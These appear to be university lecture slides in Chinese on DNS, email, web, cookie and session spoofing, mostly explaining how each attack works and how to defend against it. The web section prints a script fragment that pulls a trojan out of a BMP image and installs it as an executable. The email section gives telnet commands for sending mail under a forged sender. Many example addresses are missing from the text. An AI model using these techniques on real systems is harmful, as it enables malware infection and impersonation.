網(wǎng)絡安全7-欺騙攻擊_第1頁
網(wǎng)絡安全7-欺騙攻擊_第2頁
網(wǎng)絡安全7-欺騙攻擊_第3頁
網(wǎng)絡安全7-欺騙攻擊_第4頁
網(wǎng)絡安全7-欺騙攻擊_第5頁
已閱讀5頁,還剩101頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領

文檔簡介

網(wǎng)絡安全

劉敏賢副教授西南科技大學計算機科學與技術學院第5章緩沖區(qū)溢出攻擊回顧緩沖區(qū)溢出攻擊的基本原理、方法緩沖區(qū)溢出程序的原理及要素攻擊UNIX攻擊WINDOWS第7章欺騙攻擊欺騙攻擊是網(wǎng)絡攻擊的一種重要手段。常見的欺騙攻擊方式有:DNS欺騙攻擊;Email欺騙攻擊;Web欺騙攻擊和IP欺騙攻擊等。本章介紹這些主要欺騙攻擊的原理、實現(xiàn)技術。第7章欺騙攻擊7.1DNS欺騙攻擊7.2Email欺騙攻擊7.3Web欺騙攻擊7.4IP欺騙攻擊2023/2/35概述在Internet上計算機之間相互進行的交流建立在兩個前提之下:認證(Authentication)信任(Trust)2023/2/36概述認證:

認證是網(wǎng)絡上的計算機用于相互間進行識別的一種鑒別過程,經(jīng)過認證的過程,獲準相互交流的計算機之間就會建立起相互信任的關系。2023/2/37概述信任:

信任和認證具有逆反關系,即如果計算機之間存在高度的信任關系,則交流時就不會要求嚴格的認證。而反之,如果計算機之間沒有很好的信任關系,則會進行嚴格的認證。2023/2/38概述欺騙實質(zhì)上就是一種冒充身份通過認證騙取信任的攻擊方式。攻擊者針對認證機制的缺陷,將自己偽裝成可信任方,從而與受害者進行交流,最終攫取信息或是展開進一步攻擊。2023/2/39概述目前比較流行的欺騙攻擊主要有5種:IP欺騙:使用其他計算機的IP來騙取連接,獲得信息或者得到特權;電子郵件欺騙:電子郵件發(fā)送方地址的欺騙;DNS欺騙:域名與IP地址轉(zhuǎn)換過程中實現(xiàn)的欺騙;Web欺騙:創(chuàng)造某個萬維網(wǎng)網(wǎng)站的復制影像,從而達到欺騙網(wǎng)站用戶目的的攻擊。 DNS欺騙攻擊DNS欺騙原理假設當提交給某個域名服務器的域名解析請求的數(shù)據(jù)包被截獲,然后按截獲者的意圖將一個虛假的IP地址作為應答信息返回給請求者,這時,原始請求者就會把這個虛假的IP地址作為它所要請求的域名而進行連接,顯然它被欺騙到了別處而根本連接不上自己想要連接的那個域名

對那個客戶想要連接的域名而言,它就算是被黑掉了,因為客戶由于無法得到它的正確的IP地址而無法連接上它第7章第1節(jié)2023/2/311DNS工作原理DNS的全稱是DomainNameServer即域名服務器,當一臺主機發(fā)送一個請求要求解析某個域名時,它會首先把解析請求發(fā)到自己的DNS服務器上。DNS的功能是提供主機名字和IP地址之間的轉(zhuǎn)換信息。DNS服務器里有一個“DNS緩存表”,里面存儲了此DNS服務器所管轄域內(nèi)主機的域名和IP地址的對應關系。2023/2/312DNS工作原理例如,客戶主機需要訪問時,首先要知道的IP地址。客戶主機獲得IP地址的唯一方法就是向所在網(wǎng)絡設置的DNS服務器進行查詢。查詢過程分四步進行。DNS解析出IP的過程(1)舉個例子,假設今天我們查的DomainName(作為一個dns請求)為.時,DNSServer如何處理:(1)你所用的電腦送出一個問題給這臺電腦所設定的DNSServer(LocalDNS).問:的IP是什么?(2)這臺DNS會先看看是不是在他的cache中,如果是,就給出答案.如果不是,就從最上頭(根域)查起。在DNSServer上面一定有設定的".",這個時候它就往"."層的任何一臺DNS(目前"."有13臺)問問題,問的IP誰知道?(3)"."層的DNS會回答:我這沒有

的記錄,我已經(jīng)把.com的域名解析權交給.com了,我告訴你.com的IP,你去向.com問吧,于是將結(jié)果(一個IP地址)返還給你的LocalDNS。(這個時候返回的是一個.comnameserver的IP).

DNS解析出IP的過程(2) (4)接下來你所用的LocalDNS就會向.com這層的DNS問:

的IP是什么?.comnameserver經(jīng)查找自身說:我這沒有www.的記錄,我已經(jīng)把的域名解析權交給,我告訴你

的IP地址,你問

好了!也將結(jié)果(一個IP地址)返還給LocalDNS。 (5)于是LocalDNS再向

這層的DNS問:你知道www.的IP嗎?由于

是www.的授權DNS,上面有www主機的A記錄,于是將這個IP告訴給你的LocalDNS,于是LocalDNS拿到了

的IP地址。

2023/2/315DNS工作原理

上圖中有三臺主機:客戶主機、域DNS服務器和域DNS服務器。其中域DNS服務器直接為客戶主機提供DNS服務。下面對這四個過程進行解釋。

2023/2/316DNS域名解析過程1)客戶主機軟件(例如Web瀏覽器)需要對進行解析,它向本地DNS服務器(域)發(fā)送域名解析請求,要求回復的IP地址;2)

由于本地DNS服務器的數(shù)據(jù)庫中沒有的記錄,同時緩存中也沒有記錄,所以,它會依據(jù)DNS協(xié)議機器配置向網(wǎng)絡中的其他DNS服務器提交請求。這個查詢請求逐級遞交,直到域的真正權威DNS服務器收到請求(這里省略了尋找域DNS服務器的迭代過程,假定本地DNS服務器最終找到了所需要的信息);2023/2/317DNS域名解析過程(2)3)

域DNS服務器將向域DNS服務器返回IP查詢結(jié)果(假定為);4)

域的本地DNS服務器最終將查詢結(jié)果返回給客戶主機瀏覽器,并將這一結(jié)果存儲到其DNS緩存當中,以便以后使用。在一段時間里,客戶主機再次訪問時,就可以不需要再次轉(zhuǎn)發(fā)查詢請求,而直接從緩存中提取記錄向客戶端返回IP地址了。 經(jīng)過上面幾步,客戶主機獲得了它所期待的網(wǎng)站的IP地址,這樣整個域名解析過程就結(jié)束了。2023/2/318DNS欺騙的原理及實現(xiàn)步驟當客戶主機向本地DNS服務器查詢域名的時候,如果服務器的緩存中已經(jīng)有相應記錄,DNS服務器就不會再向其他服務器進行查詢,而是直接將這條記錄返回給用戶。而入侵者欲實現(xiàn)DNS欺騙,關鍵的一個條件就是在DNS服務器的本地Cache中緩存一條偽造的解析記錄。2023/2/319DNS欺騙的原理及實現(xiàn)步驟在上面例子中,假如域DNS服務器返回的是經(jīng)過攻擊者篡改的信息,比如將指向另一個IP地址,域DNS服務器將會接受這個結(jié)果,并將錯誤的信息存儲在本地Cache中。以后在這條緩存記錄的生存期內(nèi),再向域DNS服務器發(fā)送的對的域名解析請求,所得到的IP地址都將是被篡改過的。2023/2/320DNS欺騙的原理及實現(xiàn)步驟2023/2/321DNS欺騙的原理及實現(xiàn)步驟有了對DNS服務器進行欺騙的可能,攻擊者怎樣偽造DNS應答信息就成了問題的焦點。目前有兩種可能情況下的實現(xiàn)辦法:攻擊者可以控制本地的域名服務器攻擊者無法控制任何DNS服務器2023/2/322第一種可能情況一種可能是,攻擊者可以控制本地的域名服務器(假定是域的權威),在其數(shù)據(jù)庫中增加一個附加記錄,將攻擊目標的域名(例如)指向攻擊者的欺騙IP。緊接著,攻擊者向域DNS服務器發(fā)送對域名的解析請求。域的DNS服務器自然轉(zhuǎn)而向域的DNS服務器發(fā)送請求。2023/2/323第一種可能情況(2)這時候,本地的域名服務器除了返回正常的的IP地址外,還會在返回包中附加的映射記錄。如果域的DNS服務器允許緩存所有收到的信息的話,發(fā)過來到的偽造映射記錄便“注射”到其Cache中了。2023/2/324第二種可能情況另一種更現(xiàn)實的情況,就是攻擊者無法控制任何DNS服務器,但他可以控制該服務所在網(wǎng)絡的某臺主機,并可以監(jiān)聽該網(wǎng)絡中的通信情況。這時候,黑客要對遠程的某個DNS服務器進行欺騙攻擊,所采用的手段很像IP欺騙攻擊:首先,黑客要冒充某個域名服務器的IP地址;其次,黑客要能預測目標域名服務器所發(fā)送DNS數(shù)據(jù)包的ID號。確定目標DNS服務器的ID號即為DNS欺騙攻擊的關鍵所在2023/2/325第二種可能情況(2)DNS數(shù)據(jù)是通過UDP協(xié)議傳遞的,在DNS服務器之間進行域名解析通信時,請求方和應答方都使用UDP53端口,而這樣的通信過程往往是并行的,也就是說,DNS域名服務器之間同時可能會進行多個解析過程,既然不同的過程使用相同的端口號,那靠什么來彼此區(qū)別呢?答案就在DNS報文里面。DNS報文格式頭部的ID域,是用于區(qū)別不同會話過程的,這有點類似于TCP中的序列號,域名解析的請求方和應答方只有使用相同的ID號才能證明是同一個會話(由請求方?jīng)Q定所使用的ID)。不同的解析會話,采用不同的ID號。2023/2/326第二種可能情況(3)在一段時期內(nèi),DNS服務器一般都采用一種有章可循的ID生成機制,例如,對于每次發(fā)送的域名解析請求,依次將數(shù)據(jù)包中的ID加1。如此一來,攻擊者如果可以在某個DNS服務器的網(wǎng)絡中進行嗅探,他只要向遠程的DNS服務器發(fā)送一個對本地某域名的解析請求,通過嗅探得到的來自目標DNS服務器的請求數(shù)據(jù)包(因為遠程DNS服務器肯定會轉(zhuǎn)而請求本地的DNS服務器),攻擊者就可以得到想要的ID號了。2023/2/327第二種可能情況(4)例子:

域的DNS服務器向域的DNS服務器請求解析,如果攻擊者所偽造的DNS應答包中含有正確的ID號,并且搶在域的DNS服務器之前向域的DNS服務器返回偽造信息,欺騙攻擊就將獲得成功的。2023/2/328第二種可能情況(5)其實,即使攻擊者無法監(jiān)聽某個擁有DNS服務器的網(wǎng)絡,也有辦法得到目標DNS服務器的ID號。首先,他向目標DNS服務器請求對某個不存在域名地址(但該域是存在的)進行解析。然后,攻擊者冒充所請求域的DNS服務器,向目標DNS服務器連續(xù)發(fā)送應答包,這些包中的ID號依次遞增。過一段時間,攻擊者再次向目標DNS服務器發(fā)送針對該域名的解析請求,如果得到返回結(jié)果,就說明目標DNS服務器接受了剛才黑客的偽造應答,繼而說明黑客猜測的ID號在正確的區(qū)段上,否則,攻者可以再次嘗試。2023/2/329第二種可能情況(6)實際攻擊中,第二種攻擊方法實現(xiàn)比較復雜。知道了ID號,并且知道了ID號的增長規(guī)律,以下的過程類似于IP欺騙攻擊。2023/2/330一次DNS欺騙攻擊的完整過程2023/2/331DNS欺騙的局限性及防御DNS欺騙主要存在兩點局限性:攻擊者不能替換緩存中已經(jīng)存在的記錄例如,如果在這個DNS上已經(jīng)有了一條/22的對應記錄,那么入侵者試圖替換這條記錄是不可能的,也就是說,攻擊者不可能修改已經(jīng)存在的記錄。但是在DNS服務器中一些記錄可以累加。如果在DNS的緩存中已經(jīng)存在一條/22的對應記錄,攻擊者可以向緩存中再放入另一條偽造的記錄/1。這樣在DNS服務器中就有兩條的解析記錄,客戶主機查詢時,服務器會隨機返回其中一個,這樣就只有50%幾率實現(xiàn)DNS欺騙。DNS服務器存在緩存刷新時間問題在DNS應答報文里有一個字段生存時間(TTL)用來設定客戶程序保留該資源記錄的秒數(shù)。如果緩存中記錄的TTL為7200,那么DNS服務器會把的域名解析信息緩存7200秒,即兩個小時。假如攻擊者放入一條TTL為259200的記錄,那么這條記錄將會在緩存中保存三天時間。也就是說,DNS欺騙的有效時間是與緩存中記錄的TTL相關的,一旦超過緩存有效時間,除非重新構(gòu)造緩存記錄,否則DNS欺騙會自動失效。2023/2/332DNS欺騙的局限性及防御在配置DNS服務器的時候注意:使用最新版本DNS服務器軟件并及時安裝補??;關閉DNS服務器的遞歸功能:DNS服務器利用緩存中的記錄信息回答查詢請求或是DNS服務器通過查詢其它服務器獲得查詢信息并將它發(fā)送給客戶機,這兩種查詢方式稱為遞歸查詢,這種查詢方式容易導致DNS欺騙。限制區(qū)域傳輸范圍:限制域名服務器做出響應的地址、限制域名服務器做出響應的遞歸請求地址、限制發(fā)出請求的地址;限制動態(tài)更新;采用分層的DNS體系結(jié)構(gòu)。Email欺騙攻擊Email欺騙方法攻擊者佯稱自己為系統(tǒng)管理員(郵件地址和系統(tǒng)管理員完全相同),給用戶發(fā)送郵件要求用戶修改口令(口令可能為指定字符串)或在貌似正常的附件中加載病毒或其他木馬程序

第7章第2節(jié)Email欺騙攻擊Email欺騙實現(xiàn)步驟SMTP服務器允許匿名登錄填寫假的名稱和發(fā)信人地址使用web形式騙取密碼,或者使用附件植入木馬第7章第2節(jié)2023/2/335電子郵件欺騙及防御技術電子郵件欺騙的原理電子郵件欺騙的防御2023/2/336電子郵件欺騙的原理攻擊者使用電子郵件欺騙有三個目的:第一,隱藏自己的身份。第二,如果攻擊者想冒充別人,他能假冒那個人的電子郵件。第三,電子郵件欺騙能被看作是社會工程的一種表現(xiàn)形式。電子郵件欺騙的原理一個郵件系統(tǒng)的傳輸包含用戶代理(UserAgent)、傳輸代理(TransferAgent)及投遞代理(DeliveryAgent)三大部分。用戶代理是一個用戶端發(fā)信和收信的程序,負責將信件按照一定的標準包裝,然后送到郵件服務器,將信件發(fā)出或由郵件服務器收回。傳輸代理則負責信件的交換和傳輸,將信件傳送至適當?shù)泥]件服務器。再由投遞代理將信件分發(fā)至最終用戶的郵箱。在正常的情況下,郵件會盡量將發(fā)送者的名字和地址包括進郵件頭信息中,但是,有時候,發(fā)送者希望將郵件發(fā)送出去而不希望收件者知道是誰發(fā)的,這種發(fā)送郵件的方法稱為匿名郵件。實現(xiàn)匿名的一種最簡單的方法,是簡單地改變電子郵件軟件里的發(fā)送者的名字,但通過郵件頭的其它信息,仍能夠跟蹤發(fā)送者。另一種比較徹底的匿名方式是讓其他人發(fā)送這個郵件,郵件中的發(fā)信地址就變成了轉(zhuǎn)發(fā)者的地址了。現(xiàn)在因特網(wǎng)上有大量的匿名轉(zhuǎn)發(fā)者(或稱為匿名服務器)。2023/2/338電子郵件欺騙的原理執(zhí)行電子郵件欺騙有三種基本方法,每一種有不同難度級別,執(zhí)行不同層次的隱蔽。它們分別是:利用相似的電子郵件地址直接使用偽造的E-mail地址遠程登錄到SMTP端口發(fā)送郵件2023/2/339利用相似的電子郵件地址這主要是利用人們的大意心理。攻擊者找到一個受害者熟悉的名字。有了這個名字后,攻擊者注冊一個看上去像受害者熟悉的名字的郵件地址。這樣收信人很可能會回復這個郵箱發(fā)來信,這樣攻擊者就有得到想要信息的可能性。2023/2/340直接使用偽造的Email地址SMTP協(xié)議(即簡單郵件傳輸協(xié)議)有著一個致命的缺陷:它所遵循過于信任的原則,沒有設計身份驗證系統(tǒng)。SMTP建立在假定人們的身份和他們所聲稱一致的基礎之上,沒有對郵件發(fā)送者的身份進行驗證。這使得人們可以隨意構(gòu)造發(fā)件人地址來發(fā)送郵件。下頁我們通過修改郵件客戶端軟件的設置來示例這一點。2023/2/341直接使用偽造的Email地址

對于那些沒有設置SMTP身份驗證功能的郵件服務器,例如右圖所示的Outlook郵件客戶軟件就不需要做相應的設置,當用戶使用郵件客戶軟件發(fā)出電子郵件時,發(fā)送郵件服務器不會對發(fā)件人地址進行驗證或者確認,因此攻擊者能夠隨意指定他想使用的所有地址,而這些地址當然會作為郵件源出現(xiàn)在收件人的信中。2023/2/342直接使用偽造的Email地址

此外,在右圖所示的例子中,攻擊者還能夠指定他想要的任何郵件返回地址。因此當用戶回信時,答復回到攻擊者所掌握的郵箱test@test,而不是回到被盜用了地址的人那里。2023/2/343遠程登錄到SMTP端口SMTP協(xié)議一般使用25號端口,郵件服務器通過它在互聯(lián)網(wǎng)上發(fā)送郵件。執(zhí)行電子郵件欺騙的一個比較復雜的方法是遠程登錄到郵件服務器的25號端口發(fā)送郵件。2023/2/344遠程登錄到25號端口(2)攻擊者首先找到郵件服務器的IP地址,或者通過運行端口掃描程序來判斷哪些機器是25號端口開放的郵件服務器。在攻擊者有了一臺25號端口開放的機器和一臺正在運行的郵件服務器后,輸入下面的命令:telnetIP地址

25在連接上以后,再輸入下面的內(nèi)容:

HELO MAILFROM:欺騙偽裝的mail地址

RCPTTO:收件的受害者mail地址

DATA

郵件的內(nèi)容2023/2/345示例:遠程登錄25端口的Email欺騙實驗環(huán)境局域網(wǎng)mail服務器為50Mail服務器不需要身份驗證內(nèi)有兩個用戶分別為:liuy@lan.nipcchensl@lan.nipc實驗方式偽裝成liuy@lan.nipc給chensl@lan.nipc發(fā)郵件2023/2/346Email欺騙過程—telnet到服務器通過telnet,連接到郵件服務器的25端口。在cmd.exe下使用的命令:

telnet5025結(jié)果如圖所示,說明已經(jīng)連接到了25端口2023/2/347Email欺騙過程—發(fā)送郵件內(nèi)容220nipcoaMagicWinmailServer2.4(Build0530)ESMTPreadyhelo250nipcoaMagicWinmailServer2.4(Build0530)mailfrom:liuy@lan.nipc250okrcptto:chensl@lan.nipc250okdata354goaheadsubject:testto:chensl@lan.nipcfrom:liuy@lan.nipcthisisatest.250okmessageacceptedfordeliveryquit221nipcoaMagicWinmailServer2.4(Build0530)紅色部分是根據(jù)SMTP協(xié)議自行輸入的內(nèi)容;黑色部分是服務器的返回信息。說明2023/2/348Email欺騙過程—發(fā)送郵件內(nèi)容截屏2023/2/349Email欺騙過程—結(jié)果用戶chensl@lan.nipc將收到來自liuy@lan.nipc的郵件,如圖所示。但是liuy@lan.nipc并不知道自己發(fā)送了郵件。試想,如果郵件的內(nèi)容里有病毒或者其它惡意代碼,且chensl@lan.nipc信任liuy@lan.nipc,那么將會是一件多么危險的事情啊。2023/2/3505.4.2電子郵件欺騙的防御做為互聯(lián)網(wǎng)用戶,必須時刻樹立風險意識,不要隨意打開一個不可信任的郵件。此外,下面介紹幾種防范方法分別從這幾個方面入手:郵件接收者郵件發(fā)送者郵件服務器郵件加密2023/2/351防范方法—郵件接收者做為郵件接收者來說,用戶需要合理配置郵件客戶端,使每次總能顯示出完整的電子郵件地址,而不是僅僅顯示別名,完整的電子郵件地址能提供一些跡象表明正在發(fā)生一些不平常的事情。用戶應該注意檢驗發(fā)件人字段,不要被相似的發(fā)信地址所蒙蔽。2023/2/352防范方法—郵件發(fā)送者做為郵件發(fā)送者來說,如果你使用foxmail或者outlook之類的郵件客戶端,你必須保護好這些郵件客戶端,防止他人對客戶端的設置進行修改。2023/2/353防范方法—郵件服務器對于郵件服務器提供方來說,采用的SMTP身份驗證機制。原來使用SMTP協(xié)議發(fā)送郵件的時候并不需要任何驗證,身份欺騙極易實現(xiàn)。現(xiàn)在將POP協(xié)議收取郵件需要用戶名/密碼驗證的思想移至到SMTP協(xié)議,發(fā)送郵件也需要類似的驗證。絕大多數(shù)郵件服務提供商都是采用的這種做法,通常是使用與接收郵件相同的用戶名和密碼來發(fā)送郵件。采用這種方法之后,雖然SMTP協(xié)議安全性的問題仍然無法從根本上得到解決,但是電子郵件欺騙已經(jīng)變得不像過去那么容易了。2023/2/354防范方法—PGP加密還有一種可能的解決方法是使用公鑰加密,其中應用最廣泛的就是PGP郵件加密。PGP(PrettyGoodPrivacy)是一個可以讓您的電子郵件擁有保密功能的程序。藉此你可以將你的郵件加密,一旦加密后,郵件看起來是一堆無意義的亂碼。PGP提供了極強的保護功能,即使是最先進的解碼分析技術也無法解讀加密后的文字。PGP加密與解密不像其它傳統(tǒng)加密的方式,而是以公鑰密碼學為基礎的。2023/2/355防范方法—PGP加密(2)舉例來說,當你要傳送一封保密信或檔案給某人時,必須先取得那人的公鑰(PublicKey),然后利用這個公鑰將信件加密。當某人收到您加密的信件后,他必須利用相應的私鑰(SecretKey)來解密。因此,除非其它人擁有收信者的私鑰,否則無法解開發(fā)信人所加密的信件。同時,收信人在使用私鑰解密時,還必須輸入通行碼,如此又對加密后的郵件多了一層保護。Email欺騙攻擊Email欺騙的防護查看郵件原文,檢查真正的發(fā)件服務器地址通過郵件鏈接網(wǎng)頁的時候,注意真正的網(wǎng)站地址在不同的應用中,盡可能使用不相同的、無關的密碼第7章第2節(jié)Web欺騙攻擊Web欺騙攻擊原理攻擊者通過偽造某個WWW站點的影像拷貝,使該Web的入口進入到攻擊者的Web影像服務器,并經(jīng)過攻擊者機器的過濾作用,從而達到攻擊者監(jiān)控受攻擊者的任何活動以獲取有用信息的目的第7章第3節(jié)Web欺騙攻擊Web欺騙方法改寫URLWeb中的腳本第7章第3節(jié)2023/2/359Web欺騙的概念Web站點給用戶提供了豐富多彩的信息,Web頁面上的文字、圖畫與聲音可以給人深刻的印象。在計算機世界中,我們往往都習慣各類圖標、圖形,代表各類不同的含義。人們往往還會在事件的時間先后順序中得到某種暗示。如果在單擊銀行的網(wǎng)頁時username對話框同時出現(xiàn)了,用戶自然會認為應該輸入在該銀行的賬戶與口令。如果你在單擊了一個文檔鏈接后,立即開始了下載,那么你很自然地會認為該文件正從該站點下載。然而,以上的想法不一定總是正確的。Web欺騙的概念Web欺騙是一種電子信息欺騙,攻擊者創(chuàng)造了一個完整的令人信服的Web世界,但實際上它卻是一個虛假的復制。虛假的Web看起來十分逼真,它擁有相同的網(wǎng)頁和鏈接。然而攻擊者控制著這個虛假的Web站點,這樣受害者的瀏覽器和Web之間的所有網(wǎng)絡通信就完全被攻擊者截獲。2023/2/361Web欺騙的概念由于攻擊者可以觀察或者修改任何從受害者到Web服務器的信息,同樣地,也控制著從Web服務器發(fā)至受害者的返回數(shù)據(jù),這樣攻擊者就有發(fā)起攻擊的可能性。攻擊者能夠監(jiān)視被攻擊者的網(wǎng)絡信息,記錄他們訪問的網(wǎng)頁和內(nèi)容。當被攻擊者填完一個表單并發(fā)送后,這些數(shù)據(jù)將被傳送到Web服務器,Web服務器將返回必要的信息,但不幸的是,攻擊者完全可以截獲并使用這些信息。2023/2/362Web欺騙的概念在得到必要的數(shù)據(jù)后,攻擊者可以通過修改受害者和Web服務器兩方任何一方數(shù)據(jù),來進行破壞活動。攻擊者可以修改受害者的確認數(shù)據(jù),攻擊者還可以修改Web服務器返回的數(shù)據(jù)。2023/2/363Web欺騙的工作原理Web欺騙能夠成功的關鍵是在受害者和真實Web服務器之間插入攻擊者的Web服務器,這種攻擊常被稱為“中間人攻擊(man-in-the-middle)”。2023/2/364Web欺騙的工作原理為了建立這樣的Web服務器,攻擊者要完成以下工作:攻擊者改寫Web頁中的所有URL地址,使它們指向攻擊者的Web服務器不是真正的Web服務器。例如,

將變?yōu)?。2023/2/365Web欺騙的工作原理當用戶單擊改寫過的

/連接,將進入的是

/,再由/向

/發(fā)出請求并獲得真正的文檔,這樣攻擊者就可以改寫文檔中的所有鏈接,最后經(jīng)過/返回給用戶的瀏覽器。2023/2/366Web欺騙的工作原理工作流程如下所示:用戶訪問偽造過的//向

/請求文檔;

/向/返回文檔;/改寫文檔中的所有URL;/向用戶返回改寫后的文檔。Web欺騙攻擊改寫URL①emailwithhtmllinksseemslikeMicrosoft①②②/③③④④htmlpagewithlinkslike:⑤⑤htmlpagewithlinkslike:

/第7章第3節(jié)Web欺騙攻擊利用Web腳本進行欺騙原理攻擊者設計一個網(wǎng)頁,并誘使受害者瀏覽該網(wǎng)頁該網(wǎng)頁中包含有一個圖片和一個腳本當瀏覽時,該圖片被下載到受害者計算機的臨時目錄中,而腳本被運行腳本的功能是將圖片中隱藏的木馬提取出來,并設置為自動執(zhí)行第7章第3節(jié)Web欺騙攻擊利用Web腳本進行欺騙基本控件a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();reg=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");a1.createInstance();FSO=a1.GetObject();第7章第3節(jié)Web欺騙攻擊Web腳本從BMP圖片中釋放程序setLt=FSO.CreateTextFile(path&"tmp.in")Lt.WriteLine("rbx")Lt.WriteLine("0")Lt.WriteLine("rcx")Lt.WriteLine("1000")Lt.WriteLine("w136")Lt.WriteLine("q")Lt.Close第7章第3節(jié)Web欺騙攻擊Web腳本從BMP圖片中釋放程序WSH.Run"command/cdebug"&path&"tmp.dat<"&path&"tmp.in>"&path&"tmp.out",false,6OnErrorResumeNextFSO.GetFile(path&"tmp.dat").Copy(winsys&"tmp.exe")FSO.GetFile(path&"tmp.dat").DeleteFSO.GetFile(path&"tmp.in").DeleteFSO.GetFile(path&"tmp.out").Delete第7章第3節(jié)Web欺騙攻擊其它Web攻擊網(wǎng)頁病毒、木馬(及時升級補丁、使用安全級別高的瀏覽器)HTTP劫持(網(wǎng)絡整體防護)網(wǎng)絡釣魚第7章第3節(jié)2023/2/373Web欺騙案例網(wǎng)絡釣魚很多人是聞其名而色變,因為它經(jīng)常扮演成一只幕后黑手伸向人們的口袋……確切地講,網(wǎng)絡釣魚就是那些黑客們借用電子郵件或是模仿網(wǎng)上銀行、網(wǎng)上購物等一切網(wǎng)上交易的頁面而制作出假的網(wǎng)頁頁面,以假亂真,讓用戶在毫不知情的情況下泄露出自己的相關賬戶信息(賬號、密碼),一旦這些黑客們得到了用戶的賬號信息,后果可想而知。經(jīng)典案例:工商銀行網(wǎng)上銀行被黑客多次偽造2023/2/3網(wǎng)絡入侵與防范講義742005年1月,一個假冒中國工商銀行網(wǎng)站出現(xiàn)在互聯(lián)網(wǎng)上,誘騙銀行卡持有人的帳戶和密碼,并導致多人的銀行存款被盜,直接經(jīng)濟損失達80萬元人民幣。中國工商銀行網(wǎng)址:http://www.i假冒工商銀行網(wǎng)址:http://www.1網(wǎng)絡釣魚喬裝銀行,眾網(wǎng)友自動上鉤2023/2/3網(wǎng)絡入侵與防范講義75工商銀行網(wǎng)站被仿造又一例URL露出了馬腳針對于站點的欺騙攻擊技術cookies欺騙攻擊session欺騙攻擊cookies欺騙原理什么是cookies?因特網(wǎng)瀏覽器的記錄標記cookies的作用?Cookies是一種能夠讓網(wǎng)站服務器把少量數(shù)據(jù)儲存到客戶端的硬盤或內(nèi)存,或是從客戶端的硬盤讀取數(shù)據(jù)的一種技術。Cookies是當你瀏覽某網(wǎng)站時,由Web服務器置于你硬盤上的一個非常小的文本文件,它可以記錄你的用戶ID、密碼、瀏覽過的網(wǎng)頁、停留的時間等信息。當你再次來到該網(wǎng)站時,網(wǎng)站通過讀取Cookies,得知你的相關信息,就可以做出相應的動作,如在頁面顯示歡迎你的標語,或者讓你不用輸入ID、密碼就直接登錄等等。cookies欺騙原理cont.Cookies在哪里?Cookies文件的存放位置為C:\DocumentsandSettings\用戶\CookiesCookies的格式?你的用戶名@產(chǎn)生的COOKIE的網(wǎng)頁文件所在的WEB目錄[COOKIE改變的次數(shù)].txt什么是Cookies欺騙?Cookies欺騙,就是在只對用戶做Cookies驗證的系統(tǒng)中,通過修改Cookies的內(nèi)容來得到相應的用戶權限登錄。cookies欺騙攻擊實現(xiàn)方法一般思路如下:

尋找具有Cookies欺騙漏洞的站點注冊用戶并登陸保存自己的Cookies

偷取其他用戶的Cookies

修改自己的Cookies等于或大致等于其

他用戶的Cookies

刷新頁面,更換身份驗證身份session欺騙原理什么是session?Session是指一個終端用戶與交互系統(tǒng)進行通信的時間間隔,通常指從注冊進入系統(tǒng)到注銷退出系統(tǒng)之間所經(jīng)過的時間。具體到Web中的Session指的就是用戶在瀏覽某個網(wǎng)站時,從進入網(wǎng)站到瀏覽器關閉所經(jīng)過的這段時間,也就是用戶瀏覽這個網(wǎng)站所花費的時間。從上述的定義中我們可以看到,Session實際上是一個特定的時間概念.

說白了也就是當一個訪問者來到你的網(wǎng)站的時候一個Session就開始了,當他離開的時候Session就結(jié)束了。session欺騙原理cont.session工作原理:web服務器能通過Session對象區(qū)分不同的瀏覽器,因為Session對象是用來記錄瀏覽器端的變量,存儲一些如用戶名等比較敏感或有用的信息。這點似乎和Cookie有點像。但我們知道Cookie的值都是保存在客戶端的,而Session的值卻是保存在服務器端。當每個訪問者第一次瀏覽器訪問服務器的一個ASP網(wǎng)頁的時候,服務器會為他創(chuàng)建一個新的并且獨立的Session對象,分配給該會話一個會話標識號,并把包含會話標識符的特殊加密版本的一個Cookie(會話標識號)發(fā)送給客戶,當瀏覽器關閉時,這個會話標識號也就消失了。什么是Session欺騙所謂Session欺騙,就是在只對用戶做Session驗證的系統(tǒng)中,通過偽造Session的內(nèi)容來得到相應的用戶權限登錄操作。session欺騙原理cont.session和cookies的區(qū)別:1.保存位置不同:Cookie是保存在客戶端。Session保存在服務器端。2.保存時間不同:Cookie可以保存在用戶電腦上一年,或者更長的時間Session往往只能保存幾十分鐘3.失效方式不同:Cookie設定時間后,會一直保存用戶的電腦上哪怕用

戶關機。Session保存服務器的內(nèi)存中,只要服務器重啟,或者網(wǎng)站關閉,都會丟失。兩者之間的關系,兩個都是用來保存用戶的信息。但是Session是基于Cookie基礎上的。如果用戶的瀏覽器禁止Cookie后,Session也是不能使用的session欺騙原理cont.Session驗證的一般步驟:登錄頁面輸入賬號密碼后,如果有你輸入賬號密碼就認為你是管理員,然后給你一個表示你身份的session值或者其他方法的驗證,接著跟上面一樣給你個表示你身份的sesion值,隨后你進入任何一個管理頁面它都要首先驗證你的session值.Session欺騙,必須有三個前提:1.進行欺騙的網(wǎng)頁和被欺騙的網(wǎng)頁必須位于同一個網(wǎng)站內(nèi)

2.必須知道管理頁面。

3.必須知道Session變量以及它的限制條件。session欺騙原理cont.session欺騙攻擊思路:已有某網(wǎng)站,下有登錄頁:Login.asp,成功登錄后轉(zhuǎn)向可以看到敏感信息的ok.asp(設有訪問限制,驗證通過則顯示),否則轉(zhuǎn)向Fail.asp。黑客先構(gòu)造一個hack.asp的網(wǎng)頁,通過瀏覽該網(wǎng)頁,建立Session會話,并設置一下Session驗證時所需要的值,然后直接訪問登錄以后的網(wǎng)頁ok.asp,由于ok.asp是通過Session來驗證的,成功繞過用戶名和密碼驗證.

如果ok.asp和hack.asp不在同一臺服務器上,這種攻擊是否可行?Session欺騙,必須有三個前提:1.進行欺騙的網(wǎng)頁和被欺騙的網(wǎng)頁必須位于同一個網(wǎng)站內(nèi)

2.必須知道后臺管理登陸頁面

